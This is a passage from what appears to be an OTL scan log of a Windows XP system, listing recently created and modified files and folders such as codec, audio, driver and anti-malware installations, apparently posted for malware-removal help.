[2010/02/21 19:35:50 | 000,084,496 | ---- | C] (Logitech, Inc.) -- C:\WINDOWS\System32\KemXML.dll
[2010/02/21 19:35:20 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Logishrd
[2010/02/21 19:34:14 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Logitech
[2010/02/21 19:33:11 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Logitech
[2010/02/21 19:30:14 | 000,000,000 | ---D | C] -- C:\Program Files\Logitech
[2010/02/21 19:30:14 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Logitech
[2010/02/21 18:15:00 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\dvdcss
[2010/02/21 17:30:12 | 000,719,872 | ---- | C] (Abysmal Software) -- C:\WINDOWS\System32\devil.dll
[2010/02/21 17:30:12 | 000,369,152 | ---- | C] (The Public) -- C:\WINDOWS\System32\avisynth.dll
[2010/02/21 17:30:10 | 000,070,656 | ---- | C] (www.helixcommunity.org) -- C:\WINDOWS\System32\yv12vfw.dll
[2010/02/21 17:30:10 | 000,070,656 | ---- | C] (www.helixcommunity.org) -- C:\WINDOWS\System32\i420vfw.dll
[2010/02/21 17:30:09 | 000,000,000 | ---D | C] -- C:\Program Files\AviSynth 2.5
[2010/02/21 17:29:57 | 000,216,064 | ---- | C] (MONOGRAM Multimedia, s.r.o.) -- C:\WINDOWS\System32\nbDX.dll
[2010/02/21 17:29:57 | 000,186,880 | ---- | C] (RadLight) -- C:\WINDOWS\System32\RLOgg.ax
[2010/02/21 17:29:57 | 000,179,200 | ---- | C] (Gabest) -- C:\WINDOWS\System32\DiracSplitter.ax
[2010/02/21 17:29:57 | 000,169,472 | ---- | C] (Gabest) -- C:\WINDOWS\System32\MatroskaDX.ax
[2010/02/21 17:29:57 | 000,163,328 | ---- | C] (Gabest) -- C:\WINDOWS\System32\flvDX.dll
[2010/02/21 17:29:57 | 000,161,792 | ---- | C] (Gabest) -- C:\WINDOWS\System32\RealMediaDX.ax
[2010/02/21 17:29:57 | 000,123,904 | ---- | C] (CoreCodec) -- C:\WINDOWS\System32\AVCDX.ax
[2010/02/21 17:29:57 | 000,092,672 | ---- | C] (RadLight) -- C:\WINDOWS\System32\RLVorbisDec.ax
[2010/02/21 17:29:57 | 000,090,112 | ---- | C] (-) -- C:\WINDOWS\System32\TTADSSplitter.ax
[2010/02/21 17:29:57 | 000,090,112 | ---- | C] (-) -- C:\WINDOWS\System32\TTADSDecoder.ax
[2010/02/21 17:29:57 | 000,067,584 | ---- | C] (RadLight, LLC) -- C:\WINDOWS\System32\RLTheoraDec.ax
[2010/02/21 17:29:57 | 000,031,232 | ---- | C] (Hans Mayerl) -- C:\WINDOWS\System32\msfDX.dll
[2010/02/21 17:29:51 | 000,000,000 | ---D | C] -- C:\Program Files\eRightSoft
[2010/02/21 16:53:41 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Padus
[2010/02/21 15:32:34 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\ScummVM
[2010/02/21 10:59:30 | 000,000,000 | ---D | C] -- C:\Program Files\ScummVM
[2010/02/21 10:58:38 | 000,000,000 | ---D | C] -- C:\Program Files\D-Fend Reloaded
[2010/02/20 23:32:41 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Audacity
[2010/02/20 23:29:42 | 000,000,000 | ---D | C] -- C:\Program Files\VST
[2010/02/20 23:28:12 | 000,000,000 | ---D | C] -- C:\Program Files\Lame for Audacity
[2010/02/20 23:27:53 | 000,000,000 | ---D | C] -- C:\Program Files\Audacity
[2010/02/20 23:27:31 | 000,000,000 | ---D | C] -- C:\Program Files\Audacity 1.3 Beta (Unicode)
[2010/02/20 23:04:50 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\vfx
[2010/02/20 23:04:42 | 000,000,000 | ---D | C] -- C:\Program Files\VFX
[2010/02/20 03:37:47 | 000,000,000 | ---D | C] -- C:\Program Files\Evernote
[2010/02/18 20:44:19 | 000,000,000 | ---D | C] -- C:\Program Files\Alwil Software
[2010/02/18 20:18:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\KeePassX
[2010/02/18 20:18:18 | 000,000,000 | ---D | C] -- C:\Program Files\KeePassX
[2010/02/18 20:15:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Dropbox
[2010/02/18 05:40:48 | 000,038,224 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
[2010/02/18 05:40:46 | 000,020,952 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
[2010/02/18 05:40:46 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware
[2010/02/18 05:07:54 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\appmgmt
[2010/02/17 06:02:09 | 000,157,712 | ---- | C] (Trend Micro Inc.) -- C:\WINDOWS\System32\drivers\tmcomm.sys
[2010/02/17 05:47:03 | 000,000,000 | ---D | C] -- C:\WINDOWS\McAfee.com
[2010/02/17 05:26:08 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Malwarebytes
[2010/02/17 05:26:04 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Malwarebytes
[2010/02/16 23:29:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\pss
[2010/02/16 23:02:25 | 000,000,000 | -HSD | C] -- C:\WINDOWS\CSC
[2010/02/16 22:34:54 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Cubase LE 4
[2010/02/16 21:29:46 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Studio One
[2010/02/16 21:27:34 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\PreSonus
[2010/02/16 21:01:58 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Audio
[2010/02/16 21:00:42 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Steinberg
[2010/02/16 00:14:27 | 000,000,000 | ---D | C] -- C:\Program Files\Steinberg
[2010/02/16 00:14:27 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Steinberg
[2010/02/16 00:13:43 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Syncrosoft
[2010/02/16 00:12:59 | 000,000,000 | ---D | C] -- C:\Program Files\Syncrosoft
[2010/02/16 00:06:41 | 000,183,360 | ---- | C] (TASCAM) -- C:\WINDOWS\System32\US-122_MKII_US-144_MKII.CPL
[2010/02/16 00:06:41 | 000,000,000 | ---D | C] -- C:\WINDOWS\usb-audio.deTascam
[2010/02/16 00:05:53 | 000,399,424 | ---- | C] (TASCAM) -- C:\WINDOWS\System32\drivers\tascusb2.sys
[2010/02/16 00:05:53 | 000,039,488 | ---- | C] (TASCAM) -- C:\WINDOWS\System32\drivers\tscusb2a.sys
[2010/02/16 00:05:53 | 000,026,688 | ---- | C] (TASCAM) -- C:\WINDOWS\System32\drivers\tscusb2m.sys
[2010/02/15 17:13:12 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\OpenOffice.org
[2010/02/15 16:04:06 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Downloads
[2010/02/15 16:04:05 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\NewsLeecher
[2010/02/15 09:48:44 | 000,000,000 | ---D | C] -- C:\WINDOWS\Sun
[2010/02/15 01:22:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\VirtualizedApplications
[2010/02/14 23:16:43 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Microsoft Help
[2010/02/14 23:16:43 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Microsoft Help
[2010/02/14 23:10:41 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\NVD
[2010/02/14 23:10:41 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\NVD
[2010/02/14 23:09:22 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\SoftGrid Client
[2010/02/14 23:08:46 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\SoftGrid Client
[2010/02/14 23:05:58 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\TP
[2010/02/14 21:25:15 | 000,000,000 | ---D | C] -- C:\Program Files\Seagate
[2010/02/14 01:21:31 | 000,000,000 | ---D | C] -- C:\Program Files\uTorrent
[2010/02/14 01:21:10 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\uTorrent
[2010/02/14 01:16:10 | 000,000,000 | ---D | C] -- C:\Program Files\GrabIt
[2010/02/14 01:12:30 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\DAEMON Tools Lite
[2010/02/14 01:12:25 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\DAEMON Tools Lite
[2010/02/14 01:01:57 | 000,000,000 | ---D | C] -- C:\Program Files\MSXML 4.0
[2010/02/14 00:50:53 | 000,000,000 | ---D | C] -- C:\WINDOWS\Minidump
[2010/02/14 00:23:43 | 000,000,000 | ---D | C] -- C:\Program Files\iNFO
[2010/02/14 00:14:45 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Amazon
[2010/02/13 23:18:15 | 000,798,208 | ---- | C] (Winstep Software Technologies) -- C:\WINDOWS\System32\NextControls.ocx
[2010/02/13 23:18:15 | 000,000,000 | ---D | C] -- C:\Program Files\Winstep
[2010/02/13 23:18:15 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documents\Winstep
[2010/02/13 23:15:03 | 000,299,520 | ---- | C] (InstallShield Corporation, Inc.) -- C:\WINDOWS\uninst.exe
[2010/02/13 23:15:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\WINDOWS
[2010/02/13 21:00:59 | 000,000,000 | ---D | C] -- C:\Program Files\a-squared Anti-Malware
[2010/02/13 20:56:46 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\My Widgets
[2010/02/13 20:56:39 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Yahoo
[2010/02/13 20:56:36 | 000,000,000 | ---D | C] -- C:\Program Files\Yahoo!
[2010/02/13 19:08:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\ApplicationHistory
[2010/02/13 19:07:19 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\windowspowershell
[2010/02/13 17:54:14 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documents\microsoft
[2010/02/13 17:54:05 | 000,000,000 | ---D | C] -- C:\Program Files\Windows Live SkyDrive
[2010/02/13 17:53:50 | 000,000,000 | ---D | C] -- C:\Program Files\Windows Live
[2010/02/13 17:53:29 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft SQL Server Compact Edition
[2010/02/13 17:48:31 | 000,000,000 | ---D | C] -- C:\Program Files\Windows XP Fun Pack
[2010/02/13 17:44:51 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\WMTools Downloaded Files
[2010/02/13 17:44:41 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Me\My Documents\My Videos
[2010/02/13 17:43:07 | 000,000,000 | ---D | C] -- C:\Program Files\Photo Story 3 for Windows
[2010/02/13 17:42:41 | 000,000,000 | ---D | C] -- C:\Program Files\SyncToy 2.1
[2010/02/13 17:42:26 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Sync Framework
[2010/02/13 17:30:19 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Windows Live
[2010/02/13 17:29:20 | 000,000,000 | ---D | C] -- C:\Program Files\WallpaperToy
[2010/02/13 17:22:49 | 000,000,000 | ---D | C] -- C:\Program Files\Temp
[2010/02/13 17:10:15 | 000,000,000 | -H-D | C] -- C:\WINDOWS\PIF
[2010/02/13 16:50:42 | 000,000,000 | ---D | C] -- C:\Program Files\CodeGazer
[2010/02/13 16:50:15 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\ImgBurn
[2010/02/13 16:43:39 | 000,000,000 | ---D | C] -- C:\Program Files\PeerBlock
[2010/02/13 16:42:33 | 003,939,704 | ---- | C] (Sysinternals - www.sysinternals.com) -- C:\Program Files\procexp.exe
[2010/02/13 11:31:58 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\XPSViewer
[2010/02/13 11:31:55 | 000,000,000 | ---D | C] -- C:\Program Files\MSBuild
[2010/02/13 11:31:43 | 000,000,000 | ---D | C] -- C:\Program Files\Reference Assemblies
[2010/02/13 11:28:51 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Identities
[2010/02/13 11:28:26 | 000,000,000 | ---D | C] -- C:\Program Files\Windows Desktop Search
[2010/02/13 11:28:26 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\GroupPolicy
[2010/02/13 11:28:01 | 000,000,000 | ---D | C] -- C:\Program Files\Windows Media Connect 2
[2010/02/13 11:27:15 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\drivers\UMDF
[2010/02/13 11:27:15 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\LogFiles
[2010/02/13 11:26:12 | 000,000,000 | R-SD | C] -- C:\WINDOWS\assembly
[2010/02/13 11:26:12 | 000,000,000 | ---D | C] -- C:\WINDOWS\Microsoft.NET
[2010/02/13 10:57:58 | 000,000,000 | ---D | C] -- C:\Program Files\ImgBurn
[2010/02/13 10:55:30 | 000,000,000 | ---D | C] -- C:\Program Files\OpenOffice.org 3
[2010/02/13 10:43:06 | 000,000,000 | ---D | C] -- C:\WINDOWS\Prefetch
[2010/02/13 09:53:24 | 000,000,000 | -H-D | C] -- C:\WINDOWS\msdownld.tmp
[2010/02/13 09:53:18 | 000,000,000 | ---D | C] -- C:\WINDOWS\Logs
[2010/02/13 09:47:27 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\scripting
[2010/02/13 09:47:27 | 000,000,000 | ---D | C] -- C:\WINDOWS\l2schemas
[2010/02/13 09:47:27 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\en
[2010/02/13 09:47:27 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\bits
[2010/02/13 09:45:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\network diagnostic
[2010/02/13 09:43:10 | 000,000,000 | -H-D | C] -- C:\WINDOWS\$NtServicePackUninstall$
[2010/02/13 00:41:32 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\CanonBJ
[2010/02/13 00:41:30 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\CanonIJ Uninstaller Information
[2010/02/13 00:41:24 | 000,000,000 | -H-D | C] -- C:\Program Files\CanonBJ
[2010/02/13 00:41:15 | 000,000,000 | ---D | C] -- C:\Program Files\Canon
[2010/02/13 00:12:40 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\Me\PrivacIE
[2010/02/13 00:09:49 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\Me\IETldCache
[2010/02/13 00:06:00 | 000,000,000 | ---D | C] -- C:\WINDOWS\ie8updates
[2010/02/13 00:05:48 | 000,000,000 | ---D | C] -- C:\WINDOWS\WBEM
[2010/02/13 00:04:51 | 000,000,000 | -H-D | C] -- C:\WINDOWS\ie8
[2010/02/13 00:04:51 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\en-US
[2010/02/13 00:03:17 | 000,000,000 | ---D | C] -- C:\Program Files\7-Zip
[2010/02/12 23:59:19 | 000,000,000 | ---D | C] -- C:\WINDOWS\ServicePackFiles
[2010/02/12 23:53:01 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Windows Genuine Advantage
[2010/02/12 23:52:29 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\Me\UserData
[2010/02/12 23:22:42 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Wise Installation Wizard
[2010/02/12 23:22:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\NVIDIA Corporation
[2010/02/12 23:22:28 | 000,000,000 | ---D | C] -- C:\Program Files\NVIDIA Corporation
[2010/02/12 23:19:29 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Downloads
[2010/02/12 23:17:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Mozilla
[2010/02/12 23:17:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Mozilla
[2010/02/12 23:16:42 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Lang
[2010/02/12 22:52:09 | 000,000,000 | ---D | C] -- C:\Program Files\pidgin-otr
[2010/02/12 22:51:49 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox
[2010/02/12 22:50:57 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\.purple
[2010/02/12 22:50:23 | 000,000,000 | ---D | C] -- C:\Program Files\Pidgin
[2010/02/12 22:50:16 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\GTK
[2010/02/12 22:36:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Alwil Software
[2010/02/12 22:33:50 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\PreInstall
[2010/02/12 22:29:47 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\SoftwareDistribution
[2010/02/12 22:25:39 | 000,000,000 | ---D | C] -- C:\Program Files\obj
[2010/02/12 22:25:08 | 000,000,000 | ---D | C] -- C:\WINDOWS\GBD
[2010/02/12 22:22:56 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Adobe
[2010/02/12 22:22:48 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Macromedia
[2010/02/12 22:20:01 | 000,000,000 | ---D | C] -- C:\Program Files\GIGABYTE
[2010/02/12 22:18:39 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\ReinstallBackups
[2010/02/12 22:18:36 | 000,000,000 | ---D | C] -- C:\Program Files\AMD
[2010/02/12 22:18:21 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\InstallShield
[2010/02/12 22:15:59 | 000,105,088 | ---- | C] (Realtek Semiconductor Corporation                           ) -- C:\WINDOWS\System32\drivers\Rtenicxp.sys
[2010/02/12 22:14:31 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\RTCOM
[2010/02/12 22:13:48 | 000,358,944 | ---- | C] (Realtek Semiconductor Crop.) -- C:\WINDOWS\vncutil.exe
[2010/02/12 22:13:47 | 000,129,568 | ---- | C] (Realtek Semiconductor) -- C:\WINDOWS\RtkAudioService.exe
[2010/02/12 22:13:37 | 002,815,520 | ---- | C] (RealTek Semicoductor Corp.) -- C:\WINDOWS\ALCWZRD.EXE
[2010/02/12 22:13:37 | 001,691,480 | ---- | C] (Creative) -- C:\WINDOWS\System32\drivers\Ambfilt.sys
[2010/02/12 22:13:36 | 000,000,000 | ---D | C] -- C:\Program Files\Realtek
[2010/02/12 22:13:35 | 000,000,000 | -H-D | C] -- C:\Program Files\InstallShield Installation Information
[2010/02/12 22:13:27 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\InstallShield
[2010/02/12 22:13:13 | 000,000,000 | ---D | C] -- C:\Program Files\DIFX
[2010/02/12 22:13:12 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\DRVSTORE
[2010/02/12 22:08:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Identities
[2010/02/12 22:08:37 | 000,000,000 | -H-D | C] -- C:\Program Files\Uninstall Information
[2010/02/12 22:08:34 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Me\My Documents\My Pictures
[2010/02/12 22:08:34 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Me\My Documents\My Music
[2010/02/12 22:08:20 | 000,000,000 | --SD | C] -- C:\Documents and Settings\Me\Application Data\Microsoft
[2010/02/12 22:08:20 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Me\SendTo
[2010/02/12 22:08:20 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Me\Application Data
[2010/02/12 22:08:20 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Me\Start Menu
[2010/02/12 22:08:20 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Me\Favorites
[2010/02/12 22:08:20 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\Me\Cookies
[2010/02/12 22:08:20 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Me\Templates
[2010/02/12 22:08:20 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Me\PrintHood
[2010/02/12 22:08:20 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Me\NetHood
[2010/02/12 22:08:20 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Me\Local Settings
[2010/02/12 22:08:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents
[2010/02/12 22:08:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Microsoft
[2010/02/12 22:08:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop
[2010/02/12 22:07:47 | 000,000,000 | ---D | C] -- C:\WINDOWS\SoftwareDistribution
[2010/02/12 22:07:45 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Microsoft
[2010/02/12 22:07:44 | 000,000,000 | --SD | C] -- C:\Documents and Settings\LocalService\Application Data\Microsoft
[2010/02/12 22:07:44 | 000,000,000 | ---D | C] -- C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft
[2010/02/12 22:07:29 | 000,000,000 | --SD | C] -- C:\Documents and Settings\NetworkService\Application Data\Microsoft
[2010/02/12 22:07:29 | 000,000,000 | ---D | C] -- C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft
[2010/02/12 22:05:55 | 000,079,872 | ---- | C] (Ricoh Co., Ltd.) -- C:\WINDOWS\System32\dllcache\rwia330.dll
[2010/02/12 22:05:55 | 000,079,872 | ---- | C] (Ricoh Co., Ltd.) -- C:\WINDOWS\System32\dllcache\rwia001.dll
[2010/02/12 22:04:42 | 000,054,528 | ---- | C] (Philips Semiconductors GmbH) -- C:\WINDOWS\System32\dllcache\cap7146.sys
[2010/02/12 22:04:13 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\xircom
[2010/02/12 22:04:13 | 000,000,000 | ---D | C] -- C:\Program Files\xerox
[2010/02/12 22:04:13 | 000,000,000 | ---D | C] -- C:\Program Files\microsoft frontpage
[2010/02/12 22:03:50 | 000,000,000 | -H-D | C] -- C:\WINDOWS\$hf_mig$
[2010/02/12 22:02:47 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\All Users\DRM
[2010/02/12 22:02:39 | 000,000,000 | --SD | C] -- C:\WINDOWS\Downloaded Program Files
[2010/02/12 22:02:39 | 000,000,000 | R--D | C] -- C:\WINDOWS\Offline Web Pages
[2010/02/12 22:02:31 | 000,000,000 | -H-D | C] -- C:\Program Files\WindowsUpdate
[2010/02/12 22:02:05 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\DirectX
[2010/02/12 22:01:12 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Services
[2010/02/12 22:01:07 | 000,000,000 | --SD | C] -- C:\WINDOWS\Tasks
[2010/02/12 22:01:05 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\MSSoap
[2010/02/12 22:00:57 | 000,000,000 | ---D | C] -- C:\WINDOWS\srchasst
[2010/02/12 22:00:56 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Macromed
[2010/02/12 22:00:40 | 000,000,000 | ---D | C] -- C:\Program Files\Movie Maker
[2010/02/12 22:00:25 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Restore
[2010/02/12 22:00:17 | 000,000,000 | ---D | C] -- C:\Program Files\NetMeeting
[2010/02/12 22:00:10 | 000,000,000 | ---D | C] -- C:\Program Files\Outlook Express
[2010/02/12 21:59:57 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\System
[2010/02/12 21:59:55 | 000,000,000 | ---D | C] -- C:\Program Files\Internet Explorer
[2010/02/12 21:59:54 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Documents\My Pictures
[2010/02/12 21:59:31 | 000,000,000 | ---D | C] -- C:\Program Files\ComPlus Applications
[2010/02/12 21:59:25 | 000,000,000 | ---D | C] -- C:\WINDOWS\Registration
[2010/02/12 21:59:18 | 000,000,000 | ---D | C] -- C:\Program Files\Online Services
[2010/02/12 21:59:17 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Documents\My Music
[2010/02/12 21:59:17 | 000,000,000 | ---D | C] -- C:\Program Files\Windows Media Player
[2010/02/12 21:59:12 | 000,000,000 | ---D | C] -- C:\Program Files\Messenger
[2010/02/12 21:59:05 | 000,000,000 | ---D | C] -- C:\Program Files\MSN Gaming Zone
[2010/02/12 21:57:58 | 000,000,000 | ---D | C] -- C:\Program Files\MSN
[2010/02/12 21:57:54 | 000,000,000 | ---D | C] -- C:\Program Files\Windows NT
[2010/02/12 21:57:47 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\MsDtc
[2010/02/12 21:57:44 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Com
[2010/02/12 21:57:24 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Documents\My Videos
[7 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[4 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
[1 C:\Documents and Settings\Me\*.tmp files -> C:\Documents and Settings\Me\*.tmp -> ]

[color=#E56717]========== Files - Modified Within 90 Days ==========[/color]

[2010/05/13 20:31:33 | 000,570,880 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Me\Desktop\OTL.exe
[2010/05/13 20:28:37 | 009,175,040 | -H-- | M] () -- C:\Documents and Settings\Me\NTUSER.DAT
[2010/05/13 20:24:33 | 009,115,308 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\pidgin-2.7.0.exe
[2010/05/13 20:23:26 | 000,000,642 | ---- | M] () -- C:\WINDOWS\win.ini
[2010/05/13 20:23:26 | 000,000,315 | RHS- | M] () -- C:\boot.ini
[2010/05/13 20:23:26 | 000,000,227 | ---- | M] () -- C:\WINDOWS\system.ini
[2010/05/13 20:23:00 | 000,001,014 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-746137067-1078081533-839522115-1003UA.job
[2010/05/13 16:58:35 | 000,000,104 | ---- | M] () -- C:\WINDOWS\System32\NvApps.xml
[2010/05/13 16:58:30 | 000,012,598 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2010/05/13 16:58:13 | 000,000,006 | -H-- | M] () -- C:\WINDOWS\tasks\SA.DAT
[2010/05/13 16:58:05 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2010/05/12 21:23:00 | 000,000,962 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-746137067-1078081533-839522115-1003Core.job
[2010/05/12 16:15:06 | 000,134,825 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-blank.pdf
[2010/05/12 16:10:02 | 000,182,179 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01(3).pdf
[2010/05/12 16:06:11 | 000,182,349 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01(2).pdf
[2010/05/12 15:45:03 | 000,079,807 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01.pdf
[2010/05/12 15:44:47 | 002,088,136 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01.jpg
[2010/05/12 12:40:06 | 000,000,807 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\PrimoPDF - Drop Files Here to Convert!.lnk
[2010/05/12 12:40:00 | 000,000,314 | ---- | M] () -- C:\WINDOWS\primopdf.ini
[2010/05/12 11:22:31 | 000,000,041 | ---- | M] () -- C:\Documents and Settings\Me\jagex_runescape_preferences.dat
[2010/05/12 11:22:29 | 000,000,075 | ---- | M] () -- C:\Documents and Settings\Me\jagex_runescape_preferences2.dat
[2010/05/11 16:54:22 | 002,359,350 | ---- | M] () -- C:\WINDOWS\Me.bmp
[2010/05/11 16:51:03 | 000,000,487 | ---- | M] () -- C:\Documents and Settings\Me\My Documents\Winstep.lnk
[2010/05/11 16:28:50 | 000,000,244 | ---- | M] () -- C:\Boot.bak
[2010/05/11 16:21:15 | 000,000,178 | -HS- | M] () -- C:\Documents and Settings\Me\ntuser.ini
[2010/05/11 15:08:46 | 000,071,676 | ---- | M] () -- C:\Documents and Settings\Me\My Documents\DriverAgent_scan_results
[2010/05/11 15:01:19 | 001,048,576 | ---- | M] () -- C:\bios-save.rom
[2010/05/11 14:54:31 | 000,023,456 | ---- | M] (Phoenix Technologies) -- C:\WINDOWS\System32\drivers\DrvAgent32.sys
[2010/05/10 13:34:40 | 004,236,752 | -H-- | M] () -- C:\Documents and Settings\Me\Local Settings\Application Data\IconCache.db
